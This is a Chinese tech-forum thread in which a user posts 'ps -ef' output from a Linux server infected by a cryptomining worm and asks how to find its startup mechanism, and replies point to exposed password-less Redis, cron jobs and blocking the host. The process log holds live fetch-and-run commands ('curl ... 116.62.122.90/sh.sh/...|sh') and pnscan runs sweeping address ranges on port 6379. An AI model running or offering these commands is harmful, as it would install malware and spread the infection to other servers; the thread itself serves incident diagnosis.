这是一个创建于 1766 天前的主题,其中的信息可能已经有所发展或是发生改变。
root 2147 2838 1 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 172.108.0.0/16 6379
root 2379 1 0 12:45 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh
root 2381 2379 0 12:45 ? 00:00:00 sh
root 2409 1 0 12:45 ? 00:00:00 systemd
root 2650 2381 0 12:45 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash
root 2652 2650 0 12:45 ? 00:00:00 bash
root 2836 2652 0 12:46 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh
root 2838 2836 0 12:46 ? 00:00:00 sh
root 3180 1893 0 14:42 pts/0 00:00:00 ps -ef
root 11431 24106 0 13:43 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh
root 11433 11431 0 13:43 ? 00:00:00 sh
root 17489 1 0 13:15 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh
root 17491 17489 0 13:15 ? 00:00:00 sh
root 19785 17491 0 13:15 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash
root 19787 19785 0 13:15 ? 00:00:00 bash
root 24104 31056 0 13:40 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash
root 24106 24104 0 13:40 ? 00:00:00 bash
root 29590 1 0 13:00 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh
root 29592 29590 0 13:00 ? 00:00:00 sh
root 29836 29592 0 13:00 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash
root 29838 29836 0 13:00 ? 00:00:00 bash
root 30220 19787 0 13:18 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh
root 30222 30220 0 13:18 ? 00:00:00 sh
root 31054 1 0 13:30 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh
root 31056 31054 0 13:30 ? 00:00:00 sh
root 31492 632 2 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 137.152.0.0/16 6379
root 32517 30222 2 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 100.47.0.0/16 6379
root 2650 2381 0 12:45 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash 这个命令开机就开始跑 还他妈卸载我的 proc 文件系统,软件都跑不起了,怎么找到他在哪里啊 ,妈的我快气死了
 |
1
smartwusir007 2020-01-14 14:52:05 +08:00
哈哈,挖矿病毒
|
|
2
smartwusir007 2020-01-14 14:56:27 +08:00
是不是有很多 cron 进程,关掉了还会重启?你看看 redis 是不是开放了外网端口,没设密码?关掉试试
|
 |
3
aSmallNewbie OP @smartwusir007 对啊,我找不到他怎么自动启动起来
|
|
4
aSmallNewbie OP @smartwusir007 我去试下
|
 |
5
tankren 2020-01-14 15:01:04 +08:00  2
断网 先把 wget curl 卸载 再慢慢找
上次看到一个帖子 www 账号下去看 cron |
|
6
aSmallNewbie OP |
 |
7
z1154505909 2020-01-14 15:38:44 +08:00
我公司的内部服务器也中过挖矿,
同事说定时任务没跑,直接去找定时任务的日志,看到一个莫名奇妙的定时任务在跑.还老报错, 看了下文件,复制代码上网上搜了一下,挖矿的,清理了一圈, 原因就是 redis 没有设置密码, 以前都没有映射外网端口所以一直没事,后面因为一个项目要测试,开了一下,中招了 |
 |
8
Xusually 2020-01-14 15:48:38 +08:00
这恶意脚本还是托管在阿里云的,不去举报投诉一下?
|
|
9
aSmallNewbie OP @Xusually 我们这是公司内网,映射到外网出了问题
|
 |
10
JoyBanana 2020-01-14 16:20:36 +08:00 via Android
论 redis 设置密码的重要性
|
|
11
Xusually 2020-01-14 16:24:15 +08:00
@aSmallNewbie 嗯 我知道,我是说这个恶意脚本以及其他资源是托管在阿里云的服务器上的,你找阿里云举报一下,他的这些作恶的资源可能阿里云会封停
|
 |
12
ps1aniuge 2020-01-14 16:45:20 +08:00
1 随着 linux 被挂马,被挖矿,被勒索增多。快过年之前,广大 it 安全督察人员(信息部锦衣卫)行动起来了,我很欣慰。
2 还有人讨厌 win 每月更新补丁么? 3 还在开门后一走了之?无门卫? |
 |
13
hfc 2020-01-15 09:50:28 +08:00
hosts 里把目标 ip 重定向到 127.0.0.1
|
Select Language